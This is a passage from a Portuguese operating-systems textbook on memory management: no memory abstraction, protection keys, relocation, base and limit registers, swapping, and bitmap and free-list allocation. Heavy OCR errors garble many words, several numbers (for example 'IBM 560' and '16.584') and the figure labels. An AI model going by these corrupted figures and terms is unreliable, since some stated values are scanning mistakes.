pies aos mais soflsticados, visto que o gerenciamento do 
mvel inferior da memória cache normalnienie e feito pelo 
hardware, o foco desie capitulo sera o modelo da memória 
Principal do programador e como pode ser bem gerencia - 
do, As abstraęoes para armazenamento permaneme — o 
disco — e o gerenciamento dessas abstraęocs sao o tema do 
próximo capitulo. Comeęaremos pelo sistema mais simples 
possiiei e, emao, avanęaremos gradualmente para os mais 
daborados. 



Sem abstracao de memória 


A abstraęao de memória mais simples e a ausenda de 
abstraęao* Os primdros computadores dc grandę porte (an¬ 
tes de 1960), microcomputadores (antes de 1970) e com¬ 
putadores pessoais {antes de 1980) na o possmam abstraęao 
de memória, Cada program a simples me me considerava a 
memória fisica. Quando um programa exeeutava urna im- 
truęao como 


MOV REGI STER 1,1000 


o computador apenas movia o conteudo da memória fisi¬ 
ca da posięao 1000 para REGISTER!. Assim, o modelo de 
memória apresentado ao programador era simplesmente 
a memória fisica, um conjimto de endereęos de 0 a algum 
maximo, cada endereęo correspondendo a urna cćlula que 
conttnha certo nu mero de bits, normalnienie oito. 

Nessas condięoes, nao era posswcl executardois progra¬ 
ma s na memória simuitaneamenie. Se o primeiro programa 
cscrcvcssc um novo valor para a posięao2000, por cxcmpto, 
apagaria qualquer valor que o segundo programa estivesse 
armazenando ali. Nenhum deles funcionaria e os dois pro- 
gramas ąuebrariam quase imediatamente. 

Ainda que o modelo da memória fosse apenas a me¬ 
mória fisica, havia varias opęóes possweis* Sao mostradas 
tres variaęoes na Figura 3J. O sistema operacional pode 
estar na parte inferior da memória em RAM (random acess 
Memory — memória dc acesso aleatório), como mostrado 
na Figura 3.1 (a) on pode estar em ROM (read-ortly Memory — 
memória apenas para leitura) na parte superior da memó¬ 
ria, como mostrado na Figura 3.1(b) on osdrivers de dispo- 
sitivo podem estar na parte superior da memória em ROM 
c o resto do sistema cm RAM cmbaixo, como mostrado na 
Figura 3,1(0)* O primeiro modelo era osado amigameme 
em computadores de grandę porte e nilnicomputadores e 
raramente foi utilizado depois disso* O segundo modelo ć 
usado em alguns computadores porta teis e sistemas cm- 
barcados. O tcrcciro modelo foi empregado nos prhnciros 
computadores pessoais (por cxemplo, cxecutando o M$- 
-DOS), em que a poręao do sistema na ROM e cha mada de 
BIOS (basie input output system — sistema basico de E/S), 
Os modelos (a) e (c) apreseniam a desvamagem da possi- 
bilidade dc que um erro no programa do usuario apague o 
sistema operacional possivclmcnte com resultados desas- 
trosos {como a adulteraęao do disco)* 
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Figura 3.1 Tres m ocios s im pies de organ izar a memória com um sistema operacional e urn processo de usudrio. Tambem exisfem 
outras possibilidades. 


Quando o sistema e organizado dessa forma, gcral- 
mente apenas um processo pode ser executado por vez. 
Assim quc o usuario digita u ni comando, o sistema opera- 
donal copia o programa solicitado do disco para a memoria 
e o executa. Quando o processo termina, o sistema opera- 
donal exibe um prompt e espera por um novo comando. 
Quando recebe o novo comando, carrega um novo progra¬ 
ma na memória, sobrescrevendo o primeiro. 

Um modo de obter algum gra u de paraldismo eni um 
sistema sem abstraęao de memória e programar com multi- 
plos threads. Urna vez que se suponha que todos os threads 
eni um processo romideram a mesma imagern da memória, 
o falo destes serem foręados nao e um problema. Embora 
essa ideia fundone, sua uUiidade e iimitada porąue as pes- 
soas normalnienie desejam que programas nao reladonados 
sejam executados ao mesmo tempo, algo que a abstraęao de 
threads nao proporciona. Alem do mais, e improvavel que 
sistemas tao primitivos, que nao comportam abstraęao de 
memória, sejam capazes de fornecer abstraęao de threads. 

Executando multiplos programas sem abstraęao de 
memória 

Mesmo sem abstraęao de memória, eiitrctanto, e pos- 
sfvel executar multiplos programas si multa nea men te. O 
quc o sistema operacional deve fazer e salvar o conteudo 
complcto da memória cm um arquivo de disco e, cm segui- 
da, inLroduzlc e executar o próximo programa. Coniamo 
que baja a pena s um programa por vez na memória, nao ha 
confliios. Esse conceito (troca de processos, swappwg) sera 
discutido adianie. 

O aerćseimo de hardware especial possibilita executar 
multiplos programas simyltaneamenie, mesmo sem troca 
de processos. Os primeiros modelos do IBM 360 resolve- 
ram o problema doseguinte modo. A memória foi dividida 
cm blocos de 2 KB c a ca da um foi airibmda u ma chave 
de proieęao cle 4 bits mantida em registradores espectais 
dentro da CPU. Urna maąuina com u ma memória de 1 MB 
predsava de a pen as 512 desses registradores de 4 bits para 
um lot a 3 de 256 byles de armazenamenlo de chaves, A 


PS W {program status word — palavra de status do programa) 
tambem cominha urna chave de 4 bits. O hardware 360 im 
lerrompia qualquer tentativa de um processo em execuęno 
de acessar a memória com um código de proieęao diferente 
da chave PSW. Vi$to que apenas o sistema operacional po- 
deria alterar as chaves de proieęao, impedia-se que os pro- 
cessos do usuario imerferissem no funcionamenio mutuo 
e do próprio sistema operacional, 

Entretanlo, essa soluęao tem urna desvantagem impor- 
tante, ilustrada na Figura 3.2. Tcnros aqui dois programas, 
cada um com 16 KB, como moslrado na Figura 3.2(a) e (b), 
A primeira e sombreada para indicar que tem unia chave 
de memória diferente da segunda. O primeiro programa ini- 
cializa sal lando para o endereęo 24, que eon tem urna ins- 
truęao MGV. O segundo programa inkializa saliando para o 
endereęo 28, que comem u ma instruęao CMP, As insiruęóes 
irrelevantes para essa discussao nao sao m ostra da s. Quando 
os dois programas sao carregados sucessivamenie na memó¬ 
ria, comeęando no endereęo 0, temos a situaęao da Figura 
3.2(c), Neste exemplo, supomos que o sistema operacional 
esta na regla o alt a memória e, dessa forma, nao e most rad o. 

Depois de serem carregados, os programas padem ser 
executados. Visto que lem chaves de memória diferenles, 
um nao pode danificar o oulro. Mas o problema e de naiu- 
reza diferente, Quandoo primeiro programa e inidalizado, 
exccuLa a instruęao JMP 24, que salta para a instruęao como 
espera do. Esse programa fundona normalnienie. 

No elitarno, após ter executado o primeiro programa 
por tempo su fi den te, o sistema operacional pode deddir 
execuiar o segundo programa, que foi carrega do acima do 
primeiro no endereęo 16.384. A primeira instruęao execu- 
lada e JMP 28, que salta para a instruęao ADD do primeiro 
programa, em vez de saltar para a instruęao esperada, a 
CMP. O programa provavelmente ąuebrara muito antes de 
i segundo. 

O problema central nesse caso e que ambos os pro- 
gra mas referenda m a memória fisi ca absoluta e nao e isso 
o que queremos. Dcsejamos que cada programa referen¬ 
cie um conjunto privado de endereęos que seja local para 
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■ Figura 3.2 llustraęao do problema de reaiocaęao, (a) Um program a de 16 KB. (b) Outro program a de 16 KB, (c) Os dois programas 
carregados consecuWamente na memória. 


o programa. Explicaremos cni poucas palavras como isso 
pode ser rcalizado. A soluęao tcmporaria cncontrada pclo 
IBM 560 foi mo di fi car o seg Lindo programa dinamica- 
mcnte a mcdida quc ocarregava na memória, usando uma 
tętnica conhecida como reaiocaęao estótica, que funciona 
da scguinte forma: ąuando om programa era carregado no 
endereęo 16.584, a constante 16384 era adicionada a to¬ 
dos os endereęos dc programa d u ramę o processo de carrc- 
gamemo. Embora csse rnecanismo fundone se executado 
co rre tam cnie, nao c nma soluęao muito coinum e dcixa 
mais lento o carregamento. Aiem do mais, requer iufor- 
maęoes adicionais em todos os programas executaveis para 
indicar quais palavra$ comem ou nao endereęos (relocali¬ 
żą veis). Afinal, o "28' na Figura 3.2(b) deve ser relocaliza- 
do, mas uma instmęao como 

MPV REGISTER1,28 

quc move o nu mero 28 para REGISTER! nao deve ser rclo- 
ca ii zada. O carregador prerisa dc algum modo para dizer o 
que c um endereęo e o que e unia conslante* 

Por firn, como iiulicamos no Capftulo L a historia 
lende a se repetir no ramo da eomputaęao. Embora o en- 
dereęamento direto de memória ffsica seja uma memória 
dislanie (perdoem-me) em computadores de grandę porte, 
minicompuiadores, compuiadores de mesa e notebooks, a 
ausencia de abstraęao dc memória ainda e comum cm sis- 
lemas cmbarcados e de cartóes inleligentes (smart amis). 
Dispositivos como rad i os, maquinas de lavar e fornos de 
micro-ondas atualmente tern muitos softwares (na ROM) 
e, na maioria dos ca sos, o software se mdercęa a memória 


absoluta. Isso funciona porąuc todos os programas sao co- 
nheddos antedpadamente e os usuarios nao sao livrcs para 
executar sen próprio software na torradeira. 

Sistemas cmbarcados sofislicados (como telefones celu- 
kres) tem sistemas operadonais elaborados, a o passo que 
sistemas mais simples nao os tem. Em alguns casos, ha um 
sistema operadonal, mas e apenas uma biblioteca vinculada 
com o programa aplicativo c quc fomecc chamadas dc sis- 
tema para execuiar E/S e oulras tarefas com mis. O popular 
sistema operadonal e-cos e um exemplo comum de um sis¬ 
tema operadonal como biblioteca. 


3.2 


Abstraęao de memória: 
espaęos de endereęamento 


De modo geral, a exposięao da memória fisica a proces- 
sos apresenta varias desvamagens importames. Primeiro, 
se os programas do usuario podem endereęar cada byle de 
memória, podem, intendonal ou arideiitalmente, da ni li¬ 
ca j o sistema e paralisa-lo Eadlmente (a menos que baja 
hardwares especiais como o bloąueio e esqucma de chave 
do IBM 360). Esse problema existe mesmo se apenas um 
programa de usuario (aplicaęao) estiver sendo executado. 
Segundo, com esse modelu, e diftcil exeaitar multiplos 
programas simiiltaneameme (altemando-se, se houver 
apenas uma CPU). Em compuiadores pessoais, e comum 
ter varios programas abenos ao mesmo tempo (um proces- 
sador de texto, um programa de e mail e um navegador da 
Web, por exemplo), com um deles como foco no memento 
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e os demais reativados pelo click do mouse. Visio que essa 
situaęao difirilmente e alcanęada quando nao ha abstraęao 
da memoria Esica, algo deve ser feito. 

5-2.11 A nocao de espaęo de 
endereęamento 

Para que miiltiplas aplicaęoes esiejam na me mona si¬ 
ni ul lanca menie scm interferencja mutua, doiś problemas 
devem ser resolvidos: protcęao e realocaęao. Examinamos 
uma soluęao primitiva para o primeiro, usada no IBM 360: 
rotular blocos da memória eom uma chave dc protcęao c 
comparar a chave do processo cm exccuęao com a de eada 
palavra da memória rraiperada, Emretanto, essa aborda¬ 
żem por si só nao rcsolve o ultimo problema, embora de 
possa ser resolvido realoeando os programas quando sao 
carregados, mas essa e uma soluęao lenia c complicada. 

Urna soluęao mdhor ć inventar uma abstraęao para 
a memória: o espaęo de endereęamento, Assim como o 
conceiio de proccsso cria um Lipo de CPU abstrata para 
executar progi a mas, o espaęo de endereęamento cria um 
tipo de memória abstrata para abriga-Ios. Um espaęo de 
endereęamento e o conjunto de endereęos que um pro¬ 
ccsso pode usar para cndercęar a memória. Gada proccsso 
tem sen próprio espaęo de endereęamento, independente 
dos que perlenccm a omros proccssos {exceto cm algumas 
circunstancias especiais cm que os proccssos desejam eom- 
partilhar scus cspaęos de endereęamento), 

O conceito de espaęo de endereęamento e muito gorał 
c ocorrc cm muitos contextos. Considere os numeros dc 
tclefone. Nos Estados Unidos c cm muitos outros paiscs, 
um nu mero de tclefone local e normalnienie um ronie¬ 
ni de 7 digitos. O espaęo de endereęamento para numeros 
de tclefone varia H desse modo, de 0.000.000 a 9.999.999, 
embora algims numeros, como os comeęados por 000, nao 
scjam u sad os. Com o aumemo de telcfoncs cdularcs, mo- 
dems e maąuinas de fax, esse espaęo esta se tornando mui¬ 
to peąueno, caso em que mais digitos tern de ser usados. O 
espaęo de endereęamento para poiłaś de E/S no Pentium 
varia de 0 a 16383. EndereęosIPv4 sao numeros dc 32 bals; 
portanto, seu espaęo de endereęamento varia de 0 a 2 J2 - 1 
{novamente com alguns numeros reservados). 

Os cspaęos de endereęamento nao precisam ser nume- 
ricos. O conjunto de dommios da internet f com tambem e 
um espaęo de endereęamento. Esse espaęo de endereęa¬ 
mento consiste de lodas as cadeias de comprimento de 2 a 
63 caractercs que possani ser feiias usando letras, numeros 
e hifens, seguidas por .com. Agora voce ja deve ter uma 
ideia do que sao os espaęos de endereęamento. t algo bas¬ 
ta me simples. 

Dar a eada programa scu próprio espaęo de endere¬ 
ęamento, de modo que o endereęo 28 cm um programa 
signifique uma localizaęao Esica diferente do endereęo 2S 
em outro programa, e um pouco mais dificil. Adiame, dis- 
cutiremos um modo simples, antes bastantc comuni mas 
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que caiu em desuso em decorrencia da capacidade de co- 
locaęao de esquemas muito mais complicados (e melhores) 
em chips dc CPUs modernas. 

Registradores-base e registradores-! i mi te 

Essa soluęao simples usa uma versao particularmente 
simples da realocaęao dinamiea, que mapeia eada espaęo 
de endereęamento do proccsso cm uma parte diferente da 
memória ffsica de modo simples. A soluęao classica, que 
fol usada em maquinas desde o CDC 6600 (o primeiro su¬ 
per computador do mumio) ao Intel 8088 (o coraęao do PC 
IBM original), e equipar eada CPU com dois registradores 
de hardware especiais, normalmente chamados de regis- 
tradores-base c registradores-limite. Quando registra- 
dores-base c r e gistrado res - limit c sao usados, os programas 
sao localizados em posięócs consecutWas na memória, 
onde baja espaęo e sem realocaęao duranie o carrcga- 
mento, como mostrado na Figura 3.2(c). Quando um pro- 
cesso e ex ecu ta do, o registrador-base e carregado com o 
endereęo lisico onde seu programa comeęa na memória 
e o registrador-1 imite e carregado com o comprimento do 
programa. Na Figura 3.2(c) r o valor-base e o valor-limite 
que seriam carregados nesses registradores do hardware 
quando o primeiro programa e executado sao 0 t 16.384, 
respectivamente, Os valores usados quando o segundo pro- 
grama c ex ecu ta do sao 16.384 c 32,768, respectiva menie. 
Sc um tercciro programa dc 16 KB fosse carregado direta- 
mente acima do segundo e exetwado, o registrador-base e 
o registrador-limite seriam 32,768 e 16.384. 

Gada vez que um proccsso rercrencia a memória, seja 
para recuperar uma instruęao, seja para ler ou escrever 
uma palavra de dados, o hardware da CPU automatica- 
mente aaescenta o valor-base ao endereęo gerado pdo 
proccsso antes de cnviar o endereęo ao barramento da 
memória. Simultaneamente, cle verilica se o endereęo ofe- 
rećido e igual ou maior que o vaior do registradorriitnile, 
caso no qual um erro e gerado e o acesso ć abonado. Desse 
modo, no caso da primeira instruęao do segundo programa 
na Figura 3.2(c), o processo execuia uma instruęao 

JMP 28 

mas o hardware a trata como se fosse 

JMP 16412 

de modo que ele pula para a instruęao CMP como era espe- 
rado. As configuraęoes do registrador-base e do registrador- 
limite durante a execuęao do segundo programa da Figura 
3.2(c) sao mostradas na Figura 3.3. 

Usar registradores-limite e registradores-base e um 
modo facil de dar a eada processo seu próprio espaęo de 
endereęamemo privado porąue eada endereęo de memória 
gerado au i oma ti ca nieme tern o conteiido do registrador- 
-base acrescentado a ele antes de ser enviado a memória, 
Em muitas implementaęoes, o registrador-base e o regis- 
trador-limite sao protegidos de modo que apenas o sistema 
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I Fisjura 3.3 O registrador-lim Ete e o neg istrador- basa 
podem ser usados para dar a cada processo um espaęo de 
endereęamento independente. 


operariona! possa modifka-ios. Essc foi o caso do CDC 
6600, mas na o do Intel 808$, qne nem mcsmo lin ha o rc- 
gistrador-limiie, Ele tinha, contudo, mulliplos registrado¬ 
res-base, que permitiam que dados e icxtos de progi a mas, 
por exemp]o, Eossem realocados indepcndeniemente, mas 
que nao ofercciam proicęao eonira rcferendas a memória 
alern da capacidade. 

Urna deśYantagem da realocaęao usando registradores- 
-limile e registradores-base e a necessidade de exeoitar 
unia adięao e uma cornparaęao ern cada referenda a me¬ 
mória. As comparaęoes podem ser feitas rapidamente, mas, 
a menos quc circuitos dc adięao espcciais sejani utilizados, 
as adięoes sao dcmoradas cm virtudc do tempo de propa- 
gaęao do 'vai um'. 

Ł2,21 Troca de memória 

Se a memória Esica do computador for grandę o su- 
fidente para armazenar todos os processos, os esquemas 
descritos ale agora bastarao. Mas H na pratica, a quantidade 
total de RAM necessaria para todos os processos e freąuen- 
temente muito maior do que a memória pode compor- 
tar. Em um sistema Windows on Linux tipico, algo como 
40-60 proccssos on mais podem ser inidalizados quando 
o eotnputador c inidalizado. Por cxcmplo, ąuando uma 
aplicaęao do Windows c inslalada, frcqucntememe emitc 
comandos de modo quc, em subsequentes iniciatizaęóes 
do sistema, seja lanca do um processo que nao faęa nada 
alem de yerificar amalizaęóes para a aplicaęao. Tal processo 


pode fadlmeme octipar 5-10 MB de memória. Outros pro- 
cessos secundarios verifkam a chegada de correspondcncia 
detronica, de conexóes do sistema de rede e muitas ou- 
tras coisas. E tudo isso a mes que o primeiro programa do 
usuario seja inidalizado* Atualmente, programas serios de 
aplicaęao de usuarios podem utilizar fadlmeme de 50 a 
200 MB ou mais. Consequentemente, a ma nu ten ęa o de to¬ 
dos esses processos na memória o tempo todo reąuer uma 
quantidade de memória enorme e nao pode ser realizada se 
a memória for insufidente. 

Dois metodos gerais para lidar com a sobrecarga de 
memória tern sido deseń volvidos com o passar dos a nos. 
A estraLegia mais simples, denomitiada troca de processos 
(swappingb consiste cm trazer, em sua totalidade, cada 
processo para a memória, executa-lo durante um cer¬ 
to tempo e, entao, devolve-lo ao disco. Processos ociosos 
muitas vezcs s t io armazenados no disco, de forma que nao 
ocupein qualquer espaęo na memória quando nao estao 
exccutando (embora algims deles acordem' pcriodicamen- 
te para fazer sen trabalho, e, em seguida, vao 'dormir' 
no va men te). A oulra estrategia, denominada memória 
virtual, permite que programas possani ser executados 
rnesmo que estejam apenas parciał nieme carregados na 
memória principal. Estudaremos a seguir troca de proces¬ 
sos; na Seęao 33, trataremos de memória vimtaL 

O funrionamento de um sistema de troca de processos 
e ilustrado na Figura 3,4. Inidalmeme, somente o processo 
A esta na memória* Em seguida, os processos B e C sao cria- 
dos ou trazklos do disco. Na Figura 3.4(d), o processo A ć 
devo!vido ao disco. Ema o, o processo D entra na memória 
e, em seguida, o processo B e retirado. Por lim, o processo 
A e novamente trazido do disco para a memória. Como 
o processo A esta agora em uma localizaęao diferente na 
memória, os endereęos nele contidos devem ser relocados 
via software durante a carga na memória ou, mais prova- 
velmente, via hardware durante a execuęao do próg ram a. 
Por exemplo, registradores-base e registradores-limite fun- 
cionariam beni aqui, 

Quando as trocas de processos deixam muilos espaęos 
vazios na memória, e posswel combi na-los todos em um 
iinico espaęo comiguo de memória, movendo-os, o maxi- 
mo posswel para os endereęos mais baixos. Essa tecnica e 
denominada compactaęao de memória. Ela geralmente 
nao e usada em virtude do tempo de processamento neces- 
sario. Por exemplo, uma maquina com 1 GB de memória 
c que possa copiar 4 bytes em 20 ns gastaria ccrca de 5 
segundos para compactar toda a memória. 

Um porno importante a ser considerado relaciona-se com 
a quantidade de memória que deve ser aiocada a um processo 
quando este for criado ou trazido do disco para a memória, 
Se processos sao criados com um ta ma n ho fixo, malteravel r 
en ta o a alocaęao e simples; o sistema opera donn 1 alocara exa- 
tamente aąuilo que ć necessario, nem mais nem menos* 

Contudo, se a area de dados do processo puder cres- 
cer — por exemplo, alocando dinamicainenie memória de 
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unia area temporaria (heap), como em muitas linguagens 
de programaęao —, problemas pod era o ocoircr semprc 
que um processo temar crescer. Se houver um espaęo Uvre 
dispomvel adjacente ao processo, de podera ser alocado e 
o processo podera crescer nesse espaęo. Por outro lado, se 
estiver adjacente a outro processo, o processo que ncces- 
sita crescer podera ser movido para Lima area cle memória 
grandę o siifkiente para comc-lo ou um ou mais processos 
terać de ser iransferidcs para o disco a firn dc criar essa area 
dispomvel. Se o processo nao puder crescer na memória 
e a area de troca de disco (sur?;*) estiver cheia, o processo 
devera ser supeuso ate que aiguui espaęo seja liberado (ou 
pode ser tenninado). 

Se o esperado e que a maioria dos processos cresęa du- 
rante a exeaięao, provavelmente sera urna boa ideia alocar 
uma pequena memória extra sempre que se fizer a transfe- 


rencia de mu processo para a memória ou a movimeniaęao 
dele na memória, a fim de red uzi r o custo (extra) associa- 
do a mcvbneniaęao ou a iransfcrcneia de processos que nao 
mais cabem na memória alocada a eles. Gontu do, qua ndo os 
processos forem iransferidos de volta para o disco, somente 
a memória realmcnte em uso devera ser transferida, pois e 
dcsperdido de tu ar tambćm a tramferenda da mem ória ex- 
ira. Na Figura 3,5(a) vcmos uma configuraęaode memória na 
qual o espaęo para crcsdmcmo foi alocado a dois processos, 
Se os processos puderein lei duas areas em expansao — 
por exempIo, a area de dados sendo usada como area tem¬ 
poraria (htap) para variaveis dinamicameme alocadas e 3i- 
beradas e uma area de pilha para variaveis locais comuns 
e para endereęos de retorno — v entao uma soluęao podera 
sera mosirada na Figura 3.5(b)* Ncssa figura, vemos que 
ca da processo tern u ma pilha no topo de sua memória alo- 




(a) (b) (c) (d) (e) (i) (g) 

I Figura 3.4 Alteraęóes na aiocaęao de memórra a medida que processos en tram e saem cielą. As regioes sombreadas 
correspondem a regioes da memória nao ulilizadas naqoele instante. 





Espaęo para expansao 

Pilha B 

i 


ł 





_ 

B 


Realmertte em uso 

Dados B 


Próg rama B 

V//////////// 

mmWA 





► Espaęo para expansao 

Pilha A 

i 


f 

.t. 

, 


__Ł_ 

A 


\ Reaimente em uso 

Dados A 



Próg ram a A 

Sistema 

operacional 


Sistema 

operacional 


Espaęo para expan$ao 


Espaęo para expansao 


(a) (b) 

I Fig gra 3.5 (a) Aiocaęao de espaęo para um segmento de dados em expansao, (b) Aiocaęao de espaęo para uma piJha e um 
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cada, crescendo para baixo, e uma area de dados adjacen¬ 
ie ao código do program a, crescendo para cima. A poręao 
de memória siiuada entre essas duas areas pode ser usada 
por ambas. Sc essa poręao de memória assim situada for 
loda ocupada, emao o processo tera de ser movido para 
outra area com espaęo sufieiente, ser transferido para disco 
e esperar a te que uma area de memória grandę o bastame 
possa ser criada ou ser terminado. 

3-2.51 Cerenciando a memória livre 

Quando a memória c atribuida dinamicamente, o sis- 
tema opera ci on. a] deve gercncia-la. Dc modo gcral ha dois 
modos dc verifitar a utilizaęao da memória; ma pas de bits e 
listas livres. Nesta seęao e na próxima examinaremos esses 
dois metod os. 

Cereneiamento de memória com mapa de bits 

Com urn mapa de bits, a memória e dividida emre unida- 
des de alocaęao tao pequcnas quanto palavras chi tao grand es 
como varios kilobytes. A ca da unidade de alocaęao correspon- 
de urn bit no mapa dc bits, o qual c 0 se a unidade estivcr livre 
e I se estiver ocupada (ou vice-versa}. A Figura 3.6 mostra 
parte da memória c o mapa dc bits correspondcnte. 

O tamanho da unidade de aiocaęao e um i tein impor- 
tantc no p roje to. Qnanto menor a unidade dc aiocaęao, 
maior sera o mapa dc bits. Com u do, mesmo com uma 
unidade de aiocaęao tao peąucna quanto 4 bytes, 32 bits 
de memória necessitarao dc apenas i bit no mapa dc bits. 
Assim, uma memória com 32 m bits usara um mapa dc n 
bits, de modo que o mapa de bits ocupara somente 1/33 
da memória. Sc a unidade de alocaęao for definida como 
grandę, o mapa de bits sera menor, mas uma quamidade 
apreciavel de memória pociera ser desperdięada na ultima 
unidade do processo se o tamanho do processo nao for exa- 
tamente mutliplo da unidade de alocaęao, 

Um mapa de bits c uma maneira sirnples de gerendar 
palavras na memória em uma quantidade fixa de memória. 


pois o tamanho desse mapa de bits só depende do tamanho 
da memória e da unidade de alocaęao. O pr i napal próbie- 
ma com essa tecnica e que, qnando se decide carregar na 
memória um processo com tamanho de k unidades, o ge- 
ren da d or dc memória predsa encontrar cspaęo dispontvd 
na memória procurando no mapa de bits uma sequenda de 
k bits conseeutivos cm 0. Cssa operaęao de busca por uma 
scąućncia dc e muito lenta (porquc esta sequencia pode 
ultrapassar limites de palavras no mapa), o que constitui um 
argument o contra os mapas de bits. 

Gerentiamento de memória com listas encadeadas 

Outra maneira de gerendar o uso dc memória e man¬ 
ier uma lista encadeada dc segmentos dc memória alocados 
e disponfveis. Um segment o e tamo uma area de memória 
alocada a um processo como uma area de memória livre si¬ 
tuada entre as areas de dois processos. A memória da Fi¬ 
gura 3 + ó(a} e representada na Figura 3.ó(c) como uma lista 
encadeada de segmentos. Cada elemento dessa lista enca¬ 
deada especifica um sęgmento de memória livre (L) ou um 
segment o de memória alocado a um processo (P), o ende- 
reęo onde se iniria esse segmentu, seu comprimemo e um 
ponteiro para o próximo elemento da lisia. 

Nessc exemplo r a iista dc segmentos e ma mula ordena- 
da por endereęo. Essa ordenaęao apresema a vantageni de 
permitir uma atualizaęao rapida e sirnples da iista sempre 
quc um processo terminar sua execuęao ou for removiclo 
da memória, Um processo que termina sua cxecuęao gcral- 
mente tem dois vizinhos na lista encadeada dc segmentos 
de memória (exceto quando cstiver no imcio ou no firn 
dessa lista). Esses vizinhos podem ser ou segmentos de 
memória alocados a processos ou segmentos de memória 
iivres e, assim, as quatro combinaęoes da Figura 3.7 sao 
possfvcis. Na Figura 3.7(a), um segmentu de memória c 
liberado e a auializaęao da lista e feita peia substiiuięao dc 
um P por um L Nas figuras 3.7(b) e 3.7(c), dois segmentos 
de memória sao concatenados em um unico; a lista fica, 



I Fig uf a 3.6 (a) Parte da memória com cinco processos e tres segmentos de memória, As marcas mostram as unidades de alocaęao de 
memória. As regróes sombreadas {0 no mapa de bits) estao livres. (b) O mapa de bits correspondente, (o) A mesma infonmaęao como lista. 
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1 Figura 3.7 


Antes de X termin ar 


Após X terminar 



dessc modo, com um item a menos. Na Figura 3.7(d), tres 
scgmcntos dc memória sao tmnsformados cm um linko c 
dois itens sao diminados da lista. 

Como a cmrada da tabela de processos refercnte a um 
processo em estado de termino de execuęao geralmeme 
aponta para a emrada da lista encadeada associada a esse 
referido processo, unia lista duplamente encadeada pode 
ser mais adequada, em vez da lista com encadeamento 
simples da Figura 3.6(c). Urna lista duplamente encadeada 
torna mais facil eneomrar o item amerior na lista, a lim de 
verifkar a possibilidade de urna irustura. 

Quando os segmemos de memória alocados a proces¬ 
sos c segmemos dc memória livres sao mant kłos cm urna 
Usta ordenada por endereęo, c possml utUizar dlversos al- 
goritmos para alocar memória a um processo recem-criado 
(ou a um processo ja existeme em disco que esteja sendo 
transferido para a memória}* Vamos supor que o gerencia- 
dor de memória sai.ba quanta memória deve ser alocada aa 
processo. O algoritmo mai i simples e o first fit (primeiro 
encaixe). O gerenciador de memória procura ao longo da 
lista dc scgmcntos dc memória por um segmento livrc quc 
seja su fi cieniemente grandę para esse processo. Esse seg- 
memo e, emao, quebrado em dtias partes, u ma das quais 
e alocada ao processo, e a parte restante transforma-se cm 
tun segmento de memória livre dc tarnanho menor, exceto 
no caso tmprovave] de o tarnanho do segmento de memó¬ 
ria alocado ao processo se aj usta r exa ta menie ao tarnanho 
do segmento dc memória Hvre origiiial. O algoritmo firstfit 6 
rapido porąue procura o menos possfvd. 

Uma alt era ęa o rnenor no algoritmo first fit resulta no 
algoritmo next fit (próximo encaixe). O algoritmo nextfit 
fundona da mesma maneira que o algoritmo firstfit, exceto 
pclo Fato de sempre memorizar a posięao cm que encoiiLra 
um segmento dc memória disponkd de tarnanho su (kicn¬ 
ie* Quando o algoritmo next fit tornar a ser chamado para 
eneomrar um novo segmento de memória livre, de Inicia- 
lizara sna busca a parlir desse ponto, em vez de procurar 
sempre a parlir do inicio da lista, tal como faz o algoritmo 
firstfit, Simulaęoes fekas por Bays (1977} mostraram que 
o algoritmo mxtfit fornece um desempenho ligeiramente 
inferior ao do algoritmo first fit. 

Outro algoritmo basta nic conhecido e o best fit 
(mellior encaixe). Esse algoritmo pcsquisa a lista intcira 


c cscolhe o rnenor segmento de memória livre quc seja 
adcquado a o processo. Em vcz de eseolher um segmen¬ 
to de memória disponfvd grandę de mais que poderia 
ser necessario posteriormentc, o algoritmo best fit len¬ 
ta encontrar um segmento de memória disponivel cujo 
tarnanho seja proximo do necessario ao processo, para 
que haja maior correspondencia entre a solicitaęao e os 
scgmcntos dispomveis. 

Como cxemplo de algoritmos first fit c best fit f obser- 
ve a Figura 3*6 novameme. Se um segmento de memória 
de tarnanho 2 for necessario, o algoritmo first fit alocara o 
segmento de memória disponfvel quc se inicia na unidade 
5, mas o algoritmo best fit alocara aąuele quc sc inicia em 18. 

O algoritmo best fit ó mais lento que o algoritmo first 
fit f pois precisa pesąuisar a lista inteira cada vez que for 
chamado. O algoritmo best fiu surpreendentemente, tam- 
bem resulta em maior desperdicio de memória do que os 
algoritmos first fit c next fiu pois tende a dcixar dispomveis 
i nu m eros segmemos mtnusculos de memória e conse- 
quememente inuteis, Em media, o algoritmo first fit gera 
scgmcntos de memória dispomveis ma lor es. 

Para evitar o problema de alocar um segmento de mc- 
mória dispomvcl dc tarnanho quasc cxato ao rcąuisitado 
pelo processo e, assim, gerar outro minilsculo segmento de 
memória disponivel, seria posstvel pensar em um algoritmo 
worst fit (piór cncaixe), isto e, cni quc sempre sc esco- 
lliesse o maior segmento de memória disponfyel, de modo 
que, quando dividido, o segmento de memória dispomvel 
restante, após a alocaęao ao processo, fosse sufkientemen- 
le grandę para ser util depois, Entretanto, simulaęócs tein 
most rado quc o algoritmo worst fit na o c urna ideia mu ko 
boa. 

Todos os quatro algoritmos poderiam se tornar mais 
rapidos sc scgmcntos dc memória alocados a processos e 
scgmcntos dc memória disponiveis fossem mantidos em Hs- 
tas sępa radas. Nesse caso, todos esses algoritmos se vo!tariam 
para inspedonar segmemos de memória ainda disponweis, e 
nao scgmcntos dc memória ja alocados a processos. O j>rc^o 
inevitavelmente pa go por esse aumento de desempenho na 
alocaęao de memória e a complexidade adicional e a redu- 
ęao no desempenho da liberaęao de memória, visto quc um 
segmento dc memória li bera do leni de ser rem od do da lista 
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de segmentos de memória alocados a processos e inserLdo na 
lisia de segmenlos de memória dispomveis, 

Se listas dislintas forem usadas para segmentos de me¬ 
mória alocados a processos e para segmentos de memória 
dispomveis, a lista de segmentos de memória disponfreis 
podera ser mamida ordenada por tamanho, tornando o 
algoritmo bestfit mais rapido, Quando o algoritmo bestfit 
pesąuisar a lista dc segmentos dc memória dispomvds do 
menor para o maior r ao encontrar urn segmenio de tama- 
nho adeąuado, tera tambem a certeza de qtie se irata do 
menor segmentu de memória disponfvel e, portanto, o but 
fit. Nenhuma procura adidonal sera necessaria, como o se¬ 
ria no esąuema de lista linica. Com a lista de segmentos de 
memória di$pomveis ordenada por ta ma n ho , os algoriimos 
first fit c best fit sao igualmeiite rapidos, e lica sem sentido 
utilizar o algoritmo nextfit. 

Quando se mantem a lista de segmentos de memória 
ainda disponfveis separada da lista de segmentos de me¬ 
mória ja alocados a processos, urna pcąuena otiimaęao e 
possivcl. Em vcz dc sc ter um conjnnto separado dc estru - 
turas dc dados para a manulenęao da lista dc segmentos de 
